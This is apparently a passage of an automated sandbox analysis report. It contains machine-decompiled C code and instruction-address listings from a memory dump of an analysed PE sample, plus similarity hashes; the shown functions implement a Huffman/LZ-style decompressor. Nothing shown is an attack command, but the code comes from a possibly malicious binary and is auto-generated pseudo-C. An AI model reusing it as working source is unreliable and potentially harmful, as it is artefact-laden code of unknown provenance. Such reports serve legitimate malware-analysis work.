          														 *((char*)(_t652 + 7)) = _t390;
          														_t652 = _t652 + 8;
          														_t522 = _t522 - 1;
          														__eflags = _t522;
          													} while (_t522 != 0);
          													goto L84;
          												} else {
          													L70:
          													_push( *(_t638 + 0xe6dc));
          													_push(_t638 + 0x7c);
          													_push(_t471);
          													goto L71;
          												}
          											}
          											L51:
          											if(__eflags <= 0) {
          												_t656 = _t638 + 4;
          											} else {
          												_t439 = E00207D76(_t638 + 4);
          												_t569 = 0x24;
          												_t572 = _t643 - 4 +  *(_t638 + 8);
          												_t656 = _t638 + 4;
          												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x14);
          												 *_t656 =  *_t656 + (_t572 >> 3);
          												 *(_t656 + 4) = _t572 & 0x00000007;
          											}
          											_t429 = E001FA4ED(_t656);
          											_t430 =  *(_t638 + 0x1efc);
          											_t621 = _t429 & 0x0000fffe;
          											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
          											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
          												L56:
          												_t657 = 0xf;
          												_t431 = _t430 + 1;
          												__eflags = _t431 - _t657;
          												if(_t431 >= _t657) {
          													L62:
          													_t555 =  *(_t638 + 8) + _t657;
          													 *(_t638 + 8) = _t555 & 0x00000007;
          													_t433 = _t555 >> 3;
          													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
          													_t557 = 0x10;
          													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
          													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
          													asm("sbb eax, eax");
          													_t434 = _t433 & _t560;
          													__eflags = _t434;
          													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
          													goto L63;
          												}
          												L57:
          												_t562 = _t638 + (_t431 + 0x79f) * 4;
          												while(1) {
          													L58:
          													__eflags = _t621 -  *_t562;
          													if(_t621 <  *_t562) {
          														break;
          													}
          													L59:
          													_t431 = _t431 + 1;
          													_t562 = _t562 + 4;
          													__eflags = _t431 - 0xf;
          													if(_t431 < 0xf) {
          														continue;
          													}
          													L60:
          													goto L62;
          												}
          												L61:
          												_t657 = _t431;
          												goto L62;
          											} else {
          												L55:
          												_t563 = 0x10;
          												_t624 = _t621 >> _t563 - _t430;
          												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
          												 *_t656 =  *_t656 + (_t566 >> 3);
          												 *(_t656 + 4) = _t566 & 0x00000007;
          												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
          												L63:
          												_t471 = _t471 + (_t435 & 0x0000ffff);
          												__eflags = _t471;
          												 *(_t658 + 0x30) = _t471;
          												goto L64;
          											}
          										}
          									}
          								}
          								L28:
          								__eflags =  *((char*)(_t638 + 0x4c44));
          								if( *((char*)(_t638 + 0x4c44)) == 0) {
          									L30:
          									_t598 = _t638 + 0x7c;
          									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
          									 *_t598 =  *_t598 + 1;
          									continue;
          								}
          								L29:
          								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
          								 *(E002017A5(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
          								goto L0;
          							}
          						}
          						L13:
          						__eflags = _t483 -  *_t598;
          						if(_t483 ==  *_t598) {
          							goto L18;
          						}
          						L14:
          						E002047DA(_t638);
          						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
          						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
          						if(__eflags > 0) {
          							goto L100;
          						}
          						L15:
          						if(__eflags < 0) {
          							L17:
          							__eflags =  *((char*)(_t638 + 0x4c50));
          							if( *((char*)(_t638 + 0x4c50)) != 0) {
          								L162:
          								 *((char*)(_t638 + 0x4c60)) = 0;
          								goto L100;
          							}
          							goto L18;
          						}
          						L16:
          						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
          						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
          						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
          							goto L100;
          						}
          						goto L17;
          					}
          				}
          			}

          0x00206249
          0x00206252
          0x00206254
          0x00206254
          0x00206254
          0x00000000
          0x00206232
          0x00206185
          0x00206185
          0x00206187
          0x00000000
          0x00000000
          0x0020618d
          0x0020618d
          0x00206193
          0x00206195
          0x0020619b
          0x0020619e
          0x002061a0
          0x002061f1
          0x002061f1
          0x002061f4
          0x00000000
          0x00000000
          0x002061fa
          0x002061fc
          0x002061fc
          0x002061ff
          0x00206203
          0x00206205
          0x00206205
          0x00206209
          0x0020620e
          0x00206211
          0x00206214
          0x00206217
          0x0020621a
          0x0020621a
          0x0020621a
          0x00000000
          0x0020621f
          0x002061a2
          0x002061a4
          0x002061a5
          0x002061a7
          0x00000000
          0x00000000
          0x002061ad
          0x002061af
          0x002061af
          0x002061b2
          0x002061b2
          0x002061b4
          0x002061b6
          0x002061bc
          0x002061c2
          0x002061c8
          0x002061ce
          0x002061d4
          0x002061da
          0x002061dd
          0x002061e0
          0x002061e2
          0x002061e5
          0x002061e7
          0x002061e7
          0x002061e7
          0x00000000
          0x0020615b
          0x0020615b
          0x0020615b
          0x00206164
          0x00206165
          0x00205cb9
          0x00205cb9
          0x00205cc0
          0x00205cc5
          0x0020589e
          0x0020589e
          0x0020589e
          0x0020589e
          0x0020589e
          0x002058a1
          0x002058a1
          0x002058a1
          0x002058a7
          0x002058b2
          0x00000000
          0x002058b4
          0x002058b4
          0x002058b4
          0x00000000
          0x002058b2
          0x00000000
          0x002058a1
          0x00205eb2
          0x00205eb9
          0x00205ecd
          0x00205ecd
          0x00205ed8
          0x00205edb
          0x00205ee0
          0x00205ee2
          0x00205ee4
          0x00206001
          0x00206001
          0x00206003
          0x0020589e
          0x0020589e
          0x0020589e
          0x0020589e
          0x002058a1
          0x002058a7
          0x002058b2
          0x00000000
          0x002058b4
          0x002058b4
          0x002058b4
          0x002058b2
          0x0020589e
          0x00206009
          0x00206009
          0x0020600f
          0x0020600f
          0x00206015
          0x0020601a
          0x0020601e
          0x00206021
          0x00206026
          0x0020602f
          0x00206031
          0x00206031
          0x00206031
          0x00206259
          0x00206259
          0x00000000
          0x00206259
          0x00205eea
          0x00205eea
          0x00205eec
          0x00000000
          0x00000000
          0x00205ef2
          0x00205ef2
          0x00205ef8
          0x00205efa
          0x00205f00
          0x00205f03
          0x00205f05
          0x00205f4f
          0x00205f4f
          0x00205f52
          0x00205f7d
          0x00205f7d
          0x00205f80
          0x00205f82
          0x00000000
          0x00000000
          0x00205f88
          0x00205f8a
          0x00205f8d
          0x00205f90
          0x00205f93
          0x00000000
          0x00000000
          0x00205f99
          0x00205f9c
          0x00205f9f
          0x00205fa2
          0x00205fa5
          0x00000000
          0x00000000
          0x00205fab
          0x00205fae
          0x00205fb1
          0x00205fb4
          0x00205fb7
          0x00000000
          0x00000000
          0x00205fbd
          0x00205fc0
          0x00205fc3
          0x00205fc6
          0x00205fc9
          0x00000000
          0x00000000
          0x00205fcf
          0x00205fd2
          0x00205fd5
          0x00205fd8
          0x00205fdb
          0x00000000
          0x00000000
          0x00205fe1
          0x00205fe4
          0x00205fe7
          0x00205fea
          0x00205fed
          0x00000000
          0x00000000
          0x00205ff3
          0x00205ff6
          0x0020589e
          0x0020589e
          0x0020589e
          0x0020589e
          0x00000000
          0x0020589e
          0x0020589e
          0x00205f54
          0x00205f56
          0x00205f56
          0x00205f59
          0x00205f5d
          0x00205f5f
          0x00205f5f
          0x00205f63
          0x00205f68
          0x00205f6b
          0x00205f6e
          0x00205f71
          0x00205f74
          0x00205f74
          0x00205f74
          0x00205f79
          0x00205f79
          0x00000000
          0x00205f79
          0x00205f07
          0x00205f09
          0x00205f0a
          0x00205f0c
          0x00000000
          0x00000000
          0x00205f0e
          0x00205f10
          0x00205f10
          0x00205f13
          0x00205f13
          0x00205f15
          0x00205f17
          0x00205f1d
          0x00205f23
          0x00205f29
          0x00205f2f
          0x00205f35
          0x00205f3b
          0x00205f3e
          0x00205f41
          0x00205f43
          0x00205f46
          0x00205f48
          0x00205f48
          0x00205f48
          0x00000000
          0x00205f4d
          0x00205ebb
          0x00205ebb
          0x00205ec4
          0x00205ec5
          0x00000000
          0x00205ec5
          0x00205e73
          0x00205e7a
          0x00205e7f
          0x00205e7f
          0x00000000
          0x0020589e
          0x00206159
          0x002060af
          0x002060b5
          0x002060b8
          0x002060b8
          0x002060b8
          0x002060ba
          0x00000000
          0x00000000
          0x002060bc
          0x002060bc
          0x002060bd
          0x002060c0
          0x002060c3
          0x00000000
          0x00000000
          0x002060c5
          0x00000000
          0x002060c5
          0x002060c7
          0x002060c7
          0x00000000
          0x002060c7
          0x0020607d
          0x0020607f
          0x00206082
          0x0020608c
          0x00206094
          0x0020609a
          0x0020609d
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0020604f
          0x0020604f
          0x00206052
          0x00206054
          0x00206057
          0x00206057
          0x00206057
          0x00000000
          0x0020604f
          0x00205ea4
          0x00205ea4
          0x00205ea7
          0x00205eaa
          0x00205eaa
          0x00205e62
          0x00205e68
          0x00205e6a
          0x00205e6f
          0x00205e71
          0x00000000
          0x00000000
          0x00000000
          0x00205e71
          0x00205a64
          0x00205a64
          0x00205a6a
          0x00205a6d
          0x00205a7e
          0x00205a81
          0x00205a81
          0x00205a6f
          0x00205a6f
          0x00205a6f
          0x00205a83
          0x00205a86
          0x00205a88
          0x00205a8c
          0x00205a93
          0x00205a9b
          0x00205a9d
          0x00205aa4
          0x00205aa7
          0x00205aa7
          0x00205aaa
          0x00205aaa
          0x00205aaf
          0x00205ab6
          0x00205abc
          0x00205ac2
          0x00205ac9
          0x00205af5
          0x00205af7
          0x00205af8
          0x00205af9
          0x00205afb
          0x00205b17
          0x00205b1a
          0x00205b21
          0x00205b24
          0x00205b27
          0x00205b33
          0x00205b3f
          0x00205b41
          0x00205b47
          0x00205b49
          0x00205b49
          0x00205b4b
          0x00000000
          0x00205b4b
          0x00205afd
          0x00205b03
          0x00205b06
          0x00205b06
          0x00205b06
          0x00205b08
          0x00000000
          0x00000000
          0x00205b0a
          0x00205b0a
          0x00205b0b
          0x00205b0e
          0x00205b11
          0x00000000
          0x00000000
          0x00205b13
          0x00000000
          0x00205b13
          0x00205b15
          0x00205b15
          0x00000000
          0x00205acb
          0x00205acb
          0x00205acd
          0x00205ad0
          0x00205ada
          0x00205ae2
          0x00205ae8
          0x00205aeb
          0x00205b53
          0x00205b53
          0x00205b56
          0x00205b59
          0x00205b69
          0x00205b6c
          0x00205b6c
          0x00205b5b
          0x00205b5b
          0x00205b5b
          0x00205b6e
          0x00205b6f
          0x00205b73
          0x00205b75
          0x00205b79
          0x00205b7b
          0x00205c6f
          0x00205c6f
          0x00000000
          0x00205b81
          0x00205b81
          0x00205b81
          0x00205b84
          0x00205cca
          0x00205ccd
          0x00205cd6
          0x00205cde
          0x00205ce2
          0x00205ce6
          0x00205ced
          0x00205cf0
          0x00205cf6
          0x00205c72
          0x00205c72
          0x00205c78
          0x00205c7a
          0x00205c7b
          0x00205c81
          0x00205c83
          0x00205c84
          0x00205c8a
          0x00205c8c
          0x00205c8c
          0x00205c8c
          0x00205c8a
          0x00205c81
          0x00205c90
          0x00205c96
          0x00205c9c
          0x00205c9f
          0x00205ca2
          0x00205ca9
          0x00205cac
          0x00205cfe
          0x00205d04
          0x00205d07
          0x00205d09
          0x00205d10
          0x00205d12
          0x00205d14
          0x00205e20
          0x00205e20
          0x00205e22
          0x00000000
          0x00000000
          0x00205e28
          0x00205e28
          0x00205e2e
          0x00205e2e
          0x00205e34
          0x00205e39
          0x00205e3d
          0x00205e40
          0x00205e45
          0x00205e4e
          0x00205e50
          0x00205e50
          0x00205e50
          0x00000000
          0x00205e55
          0x00205d1a
          0x00205d1a
          0x00205d1c
          0x00000000
          0x00000000
          0x00205d22
          0x00205d22
          0x00205d28
          0x00205d2b
          0x00205d31
          0x00205d33
          0x00205d37
          0x00205d82
          0x00205d82
          0x00205d85
          0x00205db4
          0x00205db4
          0x00205db6
          0x00205dbe
          0x00205dc1
          0x00205dc4
          0x00205dcd
          0x00205dd0
          0x00205dd3
          0x00205ddc
          0x00205ddf
          0x00205de2
          0x00205deb
          0x00205dee
          0x00205df1
          0x00205dfa
          0x00205dfd
          0x00205e00
          0x00205e09
          0x00205e0c
          0x00205e0f
          0x00205e18
          0x00205e18
          0x00205e0f
          0x00205e00
          0x00205df1
          0x00205de2
          0x00205dd3
          0x00205dc4
          0x00000000
          0x00205db6
          0x00205d87
          0x00205d89
          0x00205d89
          0x00205d8c
          0x00205d90
          0x00205d92
          0x00205d92
          0x00205d96
          0x00205d9b
          0x00205d9e
          0x00205da1
          0x00205da4
          0x00205da7
          0x00205da7
          0x00205da7
          0x00205dac
          0x00205db0
          0x00000000
          0x00205db0
          0x00205d39
          0x00205d39
          0x00205d3c
          0x00000000
          0x00000000
          0x00205d3e
          0x00205d40
          0x00205d40
          0x00205d43
          0x00205d43
          0x00205d45
          0x00205d48
          0x00205d4e
          0x00205d54
          0x00205d5a
          0x00205d60
          0x00205d66
          0x00205d6c
          0x00205d6f
          0x00205d72
          0x00205d75
          0x00205d78
          0x00205d7b
          0x00205d7b
          0x00205d7b
          0x00000000
          0x00205cae
          0x00205cae
          0x00205cae
          0x00205cb7
          0x00205cb8
          0x00000000
          0x00205cb8
          0x00205cac
          0x00205b8a
          0x00205b8a
          0x00205bbd
          0x00205b8c
          0x00205b8f
          0x00205b98
          0x00205ba0
          0x00205ba3
          0x00205bab
          0x00205bb2
          0x00205bb8
          0x00205bb8
          0x00205bc2
          0x00205bc9
          0x00205bcf
          0x00205bd5
          0x00205bdc
          0x00205c08
          0x00205c0a
          0x00205c0b
          0x00205c0c
          0x00205c0e
          0x00205c2a
          0x00205c2d
          0x00205c34
          0x00205c37
          0x00205c3a
          0x00205c46
          0x00205c52
          0x00205c54
          0x00205c5a
          0x00205c5c
          0x00205c5c
          0x00205c5e
          0x00000000
          0x00205c5e
          0x00205c10
          0x00205c16
          0x00205c19
          0x00205c19
          0x00205c19
          0x00205c1b
          0x00000000
          0x00000000
          0x00205c1d
          0x00205c1d
          0x00205c1e
          0x00205c21
          0x00205c24
          0x00000000
          0x00000000
          0x00205c26
          0x00000000
          0x00205c26
          0x00205c28
          0x00205c28
          0x00000000
          0x00205bde
          0x00205bde
          0x00205be0
          0x00205be3
          0x00205bed
          0x00205bf5
          0x00205bfb
          0x00205bfe
          0x00205c66
          0x00205c69
          0x00205c69
          0x00205c6b
          0x00000000
          0x00205c6b
          0x00205bdc
          0x00205b7b
          0x00205ac9
          0x00205a1e
          0x00205a1e
          0x00205a25
          0x00205a43
          0x00205a49
          0x00205a4e
          0x00205a51
          0x00000000
          0x00205a51
          0x00205a27
          0x00205a34
          0x00205a3c
          0x00000000
          0x00205a3c
          0x0020598f
          0x00205935
          0x00205935
          0x00205937
          0x00000000
          0x00000000
          0x00205939
          0x0020593b
          0x00205940
          0x00205946
          0x0020594c
          0x00000000
          0x00000000
          0x00205952
          0x00205952
          0x00205966
          0x00205966
          0x0020596d
          0x00206261
          0x00206261
          0x00000000
          0x00206261
          0x00000000
          0x0020596d
          0x00205954
          0x00205954
          0x0020595a
          0x00205960
          0x00000000
          0x00000000
          0x00000000
          0x00205960
          0x002058a1

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
          • Instruction ID: 620a1a1bd9906c97bb6ce5120180b6f772e31bbd3b2bf2358b237f6fed62c3e6
          • Opcode Fuzzy Hash: d3517455ed077684b57ae8bd58154d4900c5f7fd798b82540100c2480b2df186
          • Instruction Fuzzy Hash: BA622A71624B899FCB25CF34C8946BABBE1AF55304F04855EDCAA8B387D734E964CB10
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 98%
          			E00206CDB(void* __ecx) {
          				intOrPtr* _t347;
          				signed int _t351;
          				signed int _t352;
          				signed int _t353;
          				signed int _t355;
          				signed int _t356;
          				signed int _t357;
          				signed int _t358;
          				signed int _t359;
          				signed int _t361;
          				signed int _t362;
          				signed int _t363;
          				void* _t365;
          				intOrPtr _t370;
          				signed int _t380;
          				char _t389;
          				unsigned int _t390;
          				signed int _t397;
          				void* _t399;
          				intOrPtr _t404;
          				signed int _t407;
          				char _t416;
          				signed int _t417;
          				char _t418;
          				signed int _t420;
          				signed int _t421;
          				signed int _t422;
          				signed int _t423;
          				signed int _t425;
          				signed int _t426;
          				signed short _t427;
          				signed int _t430;
          				void* _t435;
          				intOrPtr _t440;
          				signed int _t443;
          				char _t452;
          				unsigned int _t453;
          				signed int _t456;
          				signed int _t457;
          				signed int _t458;
          				signed int _t461;
          				signed int _t462;
          				signed short _t463;
          				unsigned int _t467;
          				unsigned int _t472;
          				intOrPtr _t489;
          				signed int _t490;
          				signed int _t491;
          				signed int _t492;
          				signed int _t493;
          				unsigned int _t496;
          				unsigned int _t498;
          				intOrPtr _t499;
          				signed int _t501;
          				intOrPtr _t505;
          				intOrPtr _t506;
          				intOrPtr _t507;
          				unsigned int _t510;
          				void* _t512;
          				signed int _t515;
          				signed int* _t518;
          				unsigned int _t521;
          				void* _t523;
          				signed int _t526;
          				signed int _t529;
          				intOrPtr _t530;
          				void* _t532;
          				signed int _t535;
          				signed int _t536;
          				intOrPtr* _t538;
          				void* _t539;
          				signed int _t542;
          				intOrPtr _t545;
          				unsigned int _t552;
          				void* _t554;
          				signed int _t557;
          				signed int _t559;
          				signed int _t561;
          				intOrPtr _t563;
          				void* _t565;
          				signed int _t568;
          				signed int _t569;
          				signed int _t571;
          				signed int _t573;
          				void* _t575;
          				signed int _t578;
          				intOrPtr* _t580;
          				void* _t581;
          				signed int _t584;
          				void* _t587;
          				signed int _t590;
          				intOrPtr* _t593;
          				void* _t594;
          				signed int _t597;
          				void* _t600;
          				signed int _t603;
          				intOrPtr* _t607;
          				void* _t608;
          				signed int _t611;
          				signed int _t614;
          				unsigned int _t616;
          				signed int _t619;
          				signed int _t620;
          				unsigned int _t622;
          				signed int _t625;
          				signed int _t628;
          				signed int _t629;
          				signed int _t630;
          				signed int _t633;
          				unsigned int _t635;
          				signed int _t638;
          				signed int _t641;
          				signed int _t644;
          				intOrPtr* _t645;
          				unsigned int _t647;
          				signed int _t650;
          				signed int _t651;
          				signed int _t652;
          				signed int _t653;
          				intOrPtr _t654;
          				signed int _t655;
          				signed int _t656;
          				signed int _t657;
          				signed int _t658;
          				signed int _t659;
          				signed int _t660;
          				signed int _t661;
          				signed int _t662;
          				void* _t663;
          				intOrPtr _t666;
          				intOrPtr* _t667;
          				intOrPtr* _t668;
          				signed int _t671;
          				signed int _t673;
          				intOrPtr* _t675;
          				signed int _t677;
          				signed int _t680;
          				intOrPtr* _t681;
          				signed int _t682;
          				signed int _t683;
          				signed int _t684;
          				signed int _t685;
          				void* _t691;
          
          				_t654 =  *((intOrPtr*)(_t691 + 0x34));
          				_t663 = __ecx;
          				if( *((char*)(_t654 + 0x2c)) != 0) {
          					L3:
          					_t505 =  *((intOrPtr*)(_t654 + 0x18));
          					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
          					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
          						L2:
          						 *((char*)(_t654 + 0x4ad0)) = 1;
          						return 0;
          					} else {
          						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
          						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
          						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
          						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
          						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
          						__eflags = _t666 - _t489;
          						if(_t666 >= _t489) {
          							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
          						}
          						_t347 = _t654 + 4;
          						while(1) {
          							_t614 =  *(_t663 + 0xe6dc);
          							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
          							_t506 =  *_t347;
          							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
          							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
          								goto L16;
          							}
          							L10:
          							__eflags = _t506 - _t666;
          							if(__eflags > 0) {
          								L100:
          								_t418 = 1;
          								L101:
          								return _t418;
          							}
          							if(__eflags != 0) {
          								L13:
          								__eflags = _t506 - _t499;
          								if(_t506 < _t499) {
          									L15:
          									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
          									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
          										L151:
          										 *((char*)(_t654 + 0x4ad3)) = 1;
          										goto L100;
          									}
          									goto L16;
          								}
          								__eflags =  *((char*)(_t654 + 0x4ad2));
          								if( *((char*)(_t654 + 0x4ad2)) == 0) {
          									goto L151;
          								}
          								goto L15;
          							}
          							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
          							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
          								goto L100;
          							}
          							goto L13;
          							L16:
          							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
          							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
          							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
          								L21:
          								_t667 = _t654 + 4;
          								_t351 = E001FA4ED(_t667);
          								_t352 =  *(_t654 + 0xb4);
          								_t616 = _t351 & 0x0000fffe;
          								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
          								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
          									_t490 = 0xf;
          									_t353 = _t352 + 1;
          									__eflags = _t353 - _t490;
          									if(_t353 >= _t490) {
          										L30:
          										_t510 =  *(_t667 + 4) + _t490;
          										 *(_t667 + 4) = _t510 & 0x00000007;
          										_t355 = _t510 >> 3;
          										 *_t667 =  *_t667 + _t355;
          										_t512 = 0x10;
          										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
          										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
          										asm("sbb eax, eax");
          										_t356 = _t355 & _t515;
          										__eflags = _t356;
          										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
          										_t347 = _t654 + 4;
          										L31:
          										__eflags = _t619 - 0x100;
          										if(_t619 >= 0x100) {
          											__eflags = _t619 - 0x106;
          											if(_t619 < 0x106) {
          												__eflags = _t619 - 0x100;
          												if(_t619 != 0x100) {
          													__eflags = _t619 - 0x101;
          													if(_t619 != 0x101) {
          														_t620 = _t619 + 0xfffffefe;
          														__eflags = _t620;
          														_t518 =  &((_t663 + 0x60)[_t620]);
          														_t491 =  *_t518;
          														 *(_t691 + 0x24) = _t491;
          														if(_t620 == 0) {
          															L122:
          															_t668 = _t654 + 4;
          															 *(_t663 + 0x60) = _t491;
          															_t357 = E001FA4ED(_t668);
          															_t358 =  *(_t654 + 0x2d78);
          															_t622 = _t357 & 0x0000fffe;
          															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
          															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
          																_t492 = 0xf;
          																_t359 = _t358 + 1;
          																__eflags = _t359 - _t492;
          																if(_t359 >= _t492) {
          																	L130:
          																	_t521 =  *(_t668 + 4) + _t492;
          																	 *(_t668 + 4) = _t521 & 0x00000007;
          																	_t361 = _t521 >> 3;
          																	 *_t668 =  *_t668 + _t361;
          																	_t523 = 0x10;
          																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
          																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
          																	asm("sbb eax, eax");
          																	_t362 = _t361 & _t526;
          																	__eflags = _t362;
          																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
          																	L131:
          																	_t493 = _t363 & 0x0000ffff;
          																	__eflags = _t493 - 8;
          																	if(_t493 >= 8) {
          																		_t671 = (_t493 >> 2) - 1;
          																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
          																		__eflags = _t493;
          																	} else {
          																		_t671 = 0;
          																	}
          																	_t496 = _t493 + 2;
          																	__eflags = _t671;
          																	if(_t671 != 0) {
          																		_t390 = E001FA4ED(_t654 + 4);
          																		_t532 = 0x10;
          																		_t496 = _t496 + (_t390 >> _t532 - _t671);
          																		_t535 =  *(_t654 + 8) + _t671;
          																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
          																		_t536 = _t535 & 0x00000007;
          																		__eflags = _t536;
          																		 *(_t654 + 8) = _t536;
          																	}
          																	_t625 =  *(_t663 + 0x7c);
          																	_t673 = _t625 -  *(_t691 + 0x24);
          																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
          																	 *(_t663 + 0x74) = _t496;
          																	__eflags = _t673 - _t365;
          																	if(_t673 >= _t365) {
          																		L147:
          																		_t347 = _t654 + 4;
          																		__eflags = _t496;
          																		if(_t496 == 0) {
          																			goto L7;
          																		}
          																		_t655 =  *(_t663 + 0xe6dc);
          																		do {
          																			_t656 = _t655 & _t673;
          																			_t673 = _t673 + 1;
          																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
          																			_t655 =  *(_t663 + 0xe6dc);
          																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
          																			_t496 = _t496 - 1;
          																			__eflags = _t496;
          																		} while (_t496 != 0);
          																		L150:
          																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
          																		L33:
          																		_t347 = _t654 + 4;
          																		goto L7;
          																	} else {
          																		__eflags = _t625 - _t365;
          																		if(_t625 >= _t365) {
          																			goto L147;
          																		}
          																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
          																		_t675 = _t673 + _t370;
          																		_t529 = _t370 + _t625;
          																		 *(_t691 + 0x1c) = _t529;
          																		 *(_t663 + 0x7c) = _t625 + _t496;
          																		__eflags =  *(_t691 + 0x24) - _t496;
          																		if( *(_t691 + 0x24) >= _t496) {
          																			__eflags = _t496 - 8;
          																			if(_t496 < 8) {
          																				L85:
          																				_t347 = _t654 + 4;
          																				__eflags = _t498;
          																				if(_t498 == 0) {
          																					L7:
          																					L8:
          																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
          																					while(1) {
          																						_t614 =  *(_t663 + 0xe6dc);
          																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
          																						_t506 =  *_t347;
          																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
          																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
          																							goto L16;
          																						}
          																						goto L10;
          																					}
          																				}
          																				 *_t529 =  *_t675;
          																				_t347 = _t654 + 4;
          																				__eflags = _t498 - 1;
          																				if(_t498 <= 1) {
          																					goto L7;
          																				}
          																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
          																				_t347 = _t654 + 4;
          																				__eflags = _t498 - 2;
          																				if(_t498 <= 2) {
          																					goto L7;
          																				}
          																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
          																				_t347 = _t654 + 4;
          																				__eflags = _t498 - 3;
          																				if(_t498 <= 3) {
          																					goto L7;
          																				}
          																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
          																				_t347 = _t654 + 4;
          																				__eflags = _t498 - 4;
          																				if(_t498 <= 4) {
          																					goto L7;
          																				}
          																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
          																				_t347 = _t654 + 4;
          																				__eflags = _t498 - 5;
          																				if(_t498 <= 5) {
          																					goto L7;
          																				}
          																				__eflags = _t498 - 6;
          																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
          																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
          																				_t347 = _t654 + 4;
          																				if(_t498 > 6) {
          																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
          																					_t347 = _t654 + 4;
          																				}
          																				goto L8;
          																			}
          																			_t380 = _t496 >> 3;
          																			__eflags = _t380;
          																			 *(_t691 + 0x24) = _t380;
          																			_t657 = _t380;
          																			do {
          																				E0020EA80(_t529, _t675, 8);
          																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
